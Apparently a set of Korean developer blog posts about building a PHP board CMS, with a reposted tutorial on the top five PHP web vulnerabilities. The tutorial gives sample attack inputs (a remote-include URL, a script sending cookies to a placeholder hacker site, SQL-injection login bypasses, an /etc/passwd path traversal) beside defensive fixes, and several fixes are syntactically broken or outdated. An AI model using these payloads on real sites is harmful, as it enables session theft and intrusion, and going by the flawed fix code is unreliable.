잠시 머리를 식힐 겸
방명록 스킨 제작에 들어간다
방명록과 메모장이 형태적으로 비슷하므로 방명록이 끝나면 메모장도 만들기 쉬울듯 하다
방명록과 메모장은 예전 제로보드 시절의 그 눈에 익은 스킨 형태로 제작할 예정이다

답글 부분은 예전엔 답글을 가져다 했던 기억이 있는데
마리홈 현재 버전에서는 답글들은 코멘트를 이용할 예정이다
스킨을 일반 스킨으로 변경시 글에 대한 응답 여부가 아무래도 본문글과 코멘트 형식이 제일 무난할 듯 하다

네이버 카톡등은 비교적 수월했다
반면 페이스북은 시간이 좀 걸렸지만 해결을 했고

문제는 구글과 트위터 인스타그램등이다

최소 6개는 작동되게 할 생각이기에 머리가 복잡해 진다
페이스북 마냥 시간이 걸리더라도 해결이 될줄 알았지만
어딘지 모르게 작동이 안된다 벌써 해볼 만큼 이것 저것 해보다 보니 머리가 복잡해져서
생각의 오류에 빠진 것 처럼 일의 진척이 오히려 후퇴를 거듭한다

잠시 쉬어야 할까!

로그인과 가입에 문제가 없다면
기존 아이디와 연동되게 하는 부분과
탈퇴 부분등 순차적으로 일 처리를 하고
회원 가입과 로그인 부분은 마무리 지을려구 했건만 발목을 아주 깊게 잡고 있다

구글은 소스 변경이 자기네 멋대로라
어제까지 되었던 것이 오늘부터 되지 않는 부분이 너무 비일 비재해서
참고 사항들을 뒤져 해보고는 있지만 역시나 안되고 있구
트위터는 너무 불성실하게 가이드를 만들어서 뜬구름 잡듯이 써놓은 글에 헤메고 있다

뭐~
그러나~
언젠가는 되겠지
항상 그래왔듯이...

시간이 어느 정도 지나면 문제를 분명 해결 해 놓을 것이다

생각 했던 과정을 어느 정도 끝마치면 작업하려 했던 것이다
이제 그 작업을 하고 있으니
그럼 생각했던 작업을 어느 정도 이뤘단 말이 역으로 성립되는가?

아니다

아직은 갈 길이 조금이라도 보이지 않을 만큼 가야 할 길이 어쩜 걸어온 길보다 많이 남아 있다
하지만 끝이 날 것 같지 않은 지겨움에 지쳐서 아무것도 하지 않고 정착하기엔
그간 걸어온 길이 너무 고단하고 길다
또한 이리 부딪히고 저리 부딪히며 마모 된 세월과 정성이 너무 아깝다

일반적으로 출시하고 업데이트란 과정을 거쳤으면 적어도 버전 3에서 5정도의 과정을 거쳤을 변화이다
왜 혼자 싸 안고 고민하는가
알아주는 이도 없을 뿐더러 일부는 깍아 내리기 까지 하는데 말이다
아마 혼자서 해야 방향성을 제대로 잡아서 움직일 수 있다고 그리 생각하고 있지만
모를 일이다
그 외의 두려움이 잡고 놓아주지 않는 것인지도

여튼
포인트와 레벨이 확립되면 권한 설정 작업이 들어갈 것 같다
그 후 한번 획을 긋기 위해서 정리 작업을 하고 넘어갈 듯 하다

스킨류를 쓰기 위해서 했던 작업중 최선의 작업이 나왔기에 그에 관한 정리가 있을 것이고
디렉터리 정리와 소스 정리가 간단하게 한번 있을듯 싶다

원본글 : https://hyess.tistory.com/33


[PHP]PHP웹 보안 취약점 TOP5(웹해킹)


국제 웹 보안 표준 기구(OWASP - Open Web Application Security Project)에서 해마다 자주 발생하는 웹보안취약점 Top 10 을 선정하여 발표 합니다. 이것을 기준으로 PHP웹 보안 취약점 Top5를 알아보고, 해결책을 제시합니다.



1. 원격 코드 실행 ( Remode Code Execution )

이 방식은 주로 소스코드에 include 함수나 fopen 함수를 이용하여 변수로 넘겨받아서 파일명을 동적으로 불러들이는 코드에서 발생합니다.

예 include $_POST['filename'] 또는 include $filename;

위 예는 홈페이지 레이아웃을 구조화(header, footer 등) 할 때 사용합니다.

해킹예) http://사이트주소/파일명?filename='http://해킹주소/hackcode.php'

해킹자가 파일명을 전송폼으로 넘기거나, 파일변수명을 확인해서 외부 사이트의 파일주소를 변수로 넘기게 되면, 외부사이트의 파일주소내용이 실행되게 됩니다.

즉, 크로스 사이트 스크립트 공격이 일어나게 됩니다. 이 취약점은 다른 웹프로그래밍 언어보다 특히 PHP 사이트 에서 자주 일어 납니다. 그 이유는, PHP.ini 설절파일의 allow_url_open 속성이 on 으로 기본값이 설정이 되어 있기 때문에 URL 형식의 파일 열기가 가능합니다. ( Remote File Injection )

기본적으로 이러한 공격의 해결 방법은 PHP.ini 설정 항목중 allow_url_open = off 로 변경후 아파치 웹서버를 재부팅하면 해결 됩니다.

하지만, 해킹자가 외부사이트의 파일을 실행하게 하지 않고, 파일업로드를 통해서 내부웹서버에 파일을 업로드하였을 경우에는 업로드한 외부파일을 이용해서 include 를 실행하게 됩니다.

따라서, 해결책은 소스코드에서 파일로 include 문을 사용하여 홈페이지 제어를 할 경우 반드시 그 파일의 경로와 이름이 올바른지 확인하는 구문을 넣어서, 검증한 후 파일을 include 할 수 있도록 처리해야 합니다.

*해결예) $valid_filename = check_validation ( $_POST['filename']); //파일 위치 검증함수 check_validation 사용 (function check_validation($filename){

if(file_exists("$DOCUMENT_ROOT/common/$filename){

echo $filename;

}else{

echo "접근경로가 올바르지 않습니다.";

exit;

}

)

include $valid_filename;



2. 크로스 사이트 스크립팅 ( XSS, Cross Site Scripting )

게시판에 글을 쓸 때 사용자가 입력한 값을 그대로 데이터베이스에 등록하고, 글 읽기 페이지에서 그대로 출력한다면, 해커는 다음과 같은 자바스크립트 코드를 글제목에 삽입하는 것으로 해당사이트를 무력화 시킬 수 있습니다.

해킹예1.<script>location.href="광고사이트";</script>

사이트방문자가 게시판 페이지에 접속하는 순간, 자동으로 제목에 입력한 사이트로 이동하게 됩니다.

해킹예2.<script>location.href='해킹사이트/cookie.php?str='+document.cookie!</script>

사이트방문자의 쿠키정보를 해킹사이트로 보내게 됩니다.

해킹예3.<img src="없는파일이름.gif" onError="location.href='광고사이트'"> 로 하면, 글내용 읽기에서 파일없음 에러이벤트가 발생하기 때문에 광고사이트로 이동합니다.

해결첵은 사용자가 입력한 값을 검증해서, 삽입할수 없는 코드를 제거하는 것 입니다.

*해결예) 모든입력상자에 아래의 코드를 적용(공통함수사용이 바람직)

php변수 $user_input = strip_tags($user_input, "<img><b>");?> img태그와 b태그만 허용

script랑 style 태그제거 while(preg_match('/</?(script|style)/m', $user_input)) {

$user_input = preg_replace('/</?(script|style)/m','',$user_input);

}

인라인 이벤트핸들러 제거 where(preg_match('/<[a-aA-Z]+.+on(load|click|error|그외핸들러추가)=".*"/?>/m',$user_input)) {

$user_input = preg_replace('/(<[a-aA-Z]+.+)on(load|click|error|그외핸들러추가)=".*"(/?>)/m','XX', $user_input);

}

$user_input = mysql_real_escape_string($user_input);//mysql전용



3. SQL 인젝션 ( SQL Injection )

가장 대표적인 방법은 사용자 인증을 우회하는 것입니다.

해킹예1) 작은 따옴표를 이용한 해킹

로그인창을 기준으로 보면

SELECT COUNT(*) FROM USERS WHERE USERID = '$_POST[USERID]' AND USERPW = '$_POST[USERPW]' 카운터가 1 이상으로 로그인 할 수 있습니다.

이경우 아이디와 암호가 모두 일치해야지만, 카운터가 1 이상으로 나오는데, 해킹자는 암호를 몰라도 해당아이디로 카운터를 발행시킬수 있습니다.

해킹자는 로그인 하고자 하는 아이디를 입력하고, 비밀번호 항목에 다음과 같은 코드를 삽입 합니다.

아디디 : admin / 암호 : ' OR ' '='

위와 같이 넣으면, SQL쿼리는 다음과 같이 수정됩니다.

SELECT COUNT(*) FROM USERS WHERE USERID = 'admin' and USERPW = ' ' OR ' '=' '

위와 같이 로그인 쿼리가 변경되기때문에 WHERE 절이 항상 참이 됩니다. 그래서, admin 아이디로 로그인하게 됩니다.

* 해결책1) 사용자가 입력한 작은따옴표가 쿼리문에 반영되는 것을 금지하는 방법

PHP.ini 설정에 magic_quotes_gpc = on 으로 변경 후 아파치 재가동( 현재 설정값 확인 내장 함수 magic_quotes_gpc(); )

이렇게 하면, GET,POST,COOKIE 를 통해서 입력되는 작은 따옴표에 모두 를 자동으로 추가해 준다.

해킹예2) 작은 따옴표를 이용한 해킹방지를 건너띄는 WHERE조건이 숫자인 쿼리일 경우

DELETE BOARD WHERE USERID='admin' AND USERPW = 1234 AND IDX = 10

전송폼 입력 아디디 : 해킹자ID / 암호 : 1234 OR 0=0--

해킹된 쿼리 DELETE BOARD WHERE USERID='admin' AND PASSWD= 1234 OR 0=0 --AND IDX =

*해결책2) 문자파라미터는 문자만, 숫자파라미터는 숫자만 입력값을 받도록 한다.

암호와 일련번호가 숫자인 경우 $_POST[PASSWD]와 $_POST[IDX]가 숫자인지 학인하는 구문을 집어 낳는다.

$PASSWD = (int)$_POST[PASSWD];

$IDX = (int)$_POST[IDX];

위처럼 파라미터로 받은 값을 숫자형으로 변환하면,OR --가 숫자가 아니기때문에 해킹자가 원하는 DELETE가 이루어지지 않는다.



4. 안전하지 않은 PHP 설정 ( 1번만 주의 깊게 보세요 )

주로 PHP.ini 설정에 관련된 문제 인데

allow_url_open 과 magic_quotes_gpc 는 위에서 설명 되었고,

1. register_globals = Off; 올바른 값

변수의 출처를 구분해주는 역할을 사용하려면, Off를 해 주어야 한다.

즉, $ID와 $_GET[ID], $_POST[ID], $_COOKIE[ID] 등의 변수출처를 알수 읶게 되어서 다른 값으로 인식하고.

On 으로 적용하면, $ID 와 $_GET[ID], $_POST[ID], $_COOKIE[ID] 은 같은 같으로 인식한다.

회원로그인시 반드시 POST방식으로 변수를 받아야 하지만, 위 설정으로 GET방식으로 받아도 로그인이 가능해 진다.

2. open_basedir = '지정된 폴더'; 지정된 폴더외에 파일 접근을 막는 방법이 있음.

3. safe_mode = On; 파일에 접근시 파일에 대한 소유권 확인 ( php 6.0 부터 설정이 없어질 예정 )



5. 파일시스템공격 ( File System Attacks )

- 첨부파일 업로드를 이용한 공격

업르드 파일에 php,html 과 같은 실행 가능한 파일을 업로드하지 못하게 자바스크립트로만 제약을 걸어 놓는 경우

햬킹예1). 해킹예 자바스크립트를 사용하지 않음으로 브라우저에서 설정([F12]키)했을 경우 업로드가 가능하게 된다.

해결책1). 아래와 같이 프로그램 코드에서 실행가능한 파일 확장자를 막는 코드를 삽입한다.

<?

$filename = 'hack.php';

$ext_exp = '.(php|php3|html|htm|cgi|pl)';

if(eregi($ext_exp,$filename))

{

echo "업로드가 불가능한 확장자 입니다.";

}

else

{

echo "업로드가 가능한 확장자 입니다.";

}



- 첨부파일 다운로드 경로를 이용한 중요파일 해킹

보통 다운로드 링크를 걸때, 직접 경로로 접근을 하지 않고, download.php 파일을 이용해서 다운로드를 구현하게 되는데...

해킹예1). http://www.도메인/bbs/download.php?filename=../../../etc/ passwd 와 같이 시스템 중요한 파일을 다운로드 할 수 있게 된다.

해결책1). download.php 파일 코딩 상단에 아래 코드를 삽입

if( eregi("..|/", $filename )

{

echo "상대경로로 접근할 수 없습니다.";

exit;

}

기타. 세션관리의 취약점(보통 셰션은 로그인 유지사용된다.)

-. 쿠키를 이용한 세션 ( 취약점.암호화 해도 콕시 툴로 하이젝킹이 가능 )

-. 서버 세션을 이용한 세션

취약점 : 서버의 PHPSESSID 는 로그인 후 브라이저를 닫아도 20 이내에는 살아 있게 됩니다.

쿠키보다는 서버세션을 이용한 로그인을 유지하는 것이 좋다.

위 2가지 모두 Cooxie 툴바 해킹툴로 세션을 알아 낼 수 있다.(하이젝킹 가능)


해킹예) 홈페이지 게시판에

<script>location.href='해킹사이트/cookie.php?str='+document.cookie!</script>

위와 같이 쿠키 값을 해킹자의 사이트로 전송하는 스크립트를 게시물에 삽입 했을때...

해결책) 상단의 2번 크로스 사이트 스크립팅 ( XSS, Cross Site Scripting ) 해결책을 사용한다.

참고로, 관리자폴더는 유추가 가능한 admin, manage 같은 폴더명을 사용하지 않도록 한다.

PHP를 조금 다룰줄 아는 분들은 스킨을 뚝딱 뚝딱 만드는데 크게 문제가 되지는 않습니다
그런데 일반 유저 입장에서는 php에 대해 알지 못하면 접근하기가 힘이 듭니다
그걸 좀더 쉽게 일반 유저와 디자이너가 쓸수 있도록 접근한게 템플릿 형태의 게시판 코드이구요

지금은 과거의 유물인 제로보드4의 경우 일반 사용자의 스킨 공여도가 무척 높았습니다

그 이유는 시대적 호응도도 있었지만 단순한 템플릿 형태의 스킨 구조와 함께
html만 알아도 크게 손색없는 디자인과 결합해 결과물을 만들어 낼수 있었기에
초등학생도 스킨을 올리고 대부분 중고생과 같은 젊은 유저가 접근했기 때문 아닌가 생각해 봅니다

좀 더 쉬운 코드의 템플릿 형태를 가진 스킨이라면 일반 사용자의 제작 참여 호응도가 늘지 않을까
생각해 봅니다

그래서 아래와 같은 공상을 했구
생각의 전환을 갖고자 소개합니다

제가 생각하는 일반 사용자의 템플릿 스킨 구조는 온전한 html 구조입니다
사용자의 업데이트용 스킨 템플릿용 치환코드는
[name] , [date] 와 같은 기존 템플릿 구조가 아닌
html에서 지원하는 HTML data-* Attributes 를 활용하면 어떨까 싶습니다

완전한 html 구조여서 로컬에서 작업하고 디자인된 페이지를 바로 확인할 수 있고 수정할수 있기에
디자인의 접근성이 용이합니다

php에서는 data 속성을 치환해서 필요한 부분을 변환 한다면 사용 가능 합니다


즉

1) <span>[name]</span> 과 같은 많이 사용되는 기존 템플릿 형식을 아래와 같이 사용합니다
<span data-templete-name>홍길동</span>

위의 구조는 바로 html로 열었을 때 확인 가능하니 디자인 하기가 용이 합니다
또한 html에서 지원하는 속성이니 문제의 여지가 없습니다
php에서는 str_replace, preg_replace, preg_match_all 같은 함수를 적절히 이용해서
스킨에서 필요한 만큼의 라인을 가져다 치환합니다
이부분을 위한 함수가 따로 있어야 합니다
data-templete-name 라는 속성을 가진 태그의 내용값인 "홍길동"을 필요한 1차 템플릿용 코드인 아래와 같이 변경합니다

2) <span data-templete-name>[name]</span> 이를 PHP에서는 기존 방식대로 치환하구요
중간에 한번의 치환 과정이 포함되어 있어 아무래도 속도가 떨어지므로 속도의 보장성을 위해

3)최종 치환된 템플릿을 따로 저장하고

4)저장된 템플릿 스킨이 있으면 그걸 가져다 치환하고
( [name] 부분의 치환 코드를 데이터 값으로 변경)
없으면 사용자가 올린 스킨을 가져와 템플릿화 합니다

좀 더 속도를 위한다면
해당 영역 혹은 해당 페이지를 파싱해서 저장하고 일정 시간마다 갱신하게 해주며

5)갱신된 파싱 페이지를 보여줍니다


정리하자면

1) <span data-templete-name>홍길동</span> 와 같은 데이터 속성을 통한 온전한 html 페이지 작성
2) 스킨에서 필요한 라인을 가져다 준비된 템플릿 코드로 변환
3) 2번을 최종 템플릿 스킨 파일로 저장
4) 최종 템플릿 스킨의 템플릿 코드를 기존 방식처럼 실질적인 디비 데이터 값으로 치환
5) 디비 접근을 줄이고 출력 속도를 높이고 싶다면 해당 페이지나 구역을 일정시간마다 파싱해서 리턴

단점으로는

여기에 필요한 기능은 자바스크립트의 돔 조작에서 innerHtml 같이 해당 돔 안의 내용을 그대로
가져오는 php의 돔 조작이 필요합니다 이 부분이 핵심 기능이며 프로그래머의 손길이 많이 갑니다


장점으로는

앞서 썼듯이 로컬에서 바로 작업중인 디자인을 바로 볼수 있으며
기존에 여러장으로 나뉘어서 최종 모습을 확인하기 어려웠던 형태를 ( head.html, body.html, foot.html )

하나의 온전한 html로 구성하기에 ( skin.html )
쉽게 디자인과 확장이 가능합니다



마리홈은 위와 같은 형식으로 최근글 스킨이 스킨화 되었습니다

파트 정리가 되어야 하며

보드 셋팅 값에도 파트 정리가 이뤄져야 한다

&nbsp;

파트는 100개 기준으로 쌓인다

&nbsp;

105개 이면

now_part 2개 이며 part_nums_total은 5이다

<em>board_part</em>&nbsp;&nbsp;&nbsp;&nbsp;에는 100개당 기준으로 쌓이며

순차적으로 100개당 한 row가 쌓이며

<font color="#0000ff">part_last_num&nbsp; 만 신경써서 현재의 값을 넣어줄것</font>

최대한 모듈화를 한다

 

메뉴, 레이아웃 ,최근 게시물, 배너, 로그인등

 

생성시

모듈을 선택 각 모듈로 들어간다

 

최초 페이지 생성 (메뉴 생성)

에디터 ->  레이아웃 선택

 

 

레이아웃의 최근 게시물 생성시

레이아웃 모듈선택  -> 라테스트 레이아웃 선택 ( 모듈 선택 )-> 라테스트 스킨 선택

 

레이아웃의 배너 생성시

레이아웃의 에디터 클릭 -> 모듈중 배너 선택

 

메뉴 생성시

에디터 -> 메뉴 생성 -> 스킨 선택

 

로그인 스킨

에디터 -> 로그인모듈 선택 -> 스킨 선택

 

 

 

------------------------------------------------------------------

각 섹션의 최근 게시물은 1차메뉴의 섹션 게시물이 기본 설정되고

상황에 따라 변경할수 있다

 

커뮤니티 섹션의 오른쪽 최근 게시물

커뮤니티 섹션에 포함된 자유게시판 들어왔을때 오른쪽 최근 게시물이 같다

 

상황에 따라 최근 게시물도 설정할수 있고 레이아웃도 바꿀수 있다

다만 레이아웃이 페이지마다 다르다면 혼동의 소지가 있으므로

위에서 설명한 기본 설정값을 추천하며 그렇게 가지고 기본 설정이 되어야 한다

가야할 길은 아직 멀지만
조금은 첫번째 기착점이 보이기 시작한다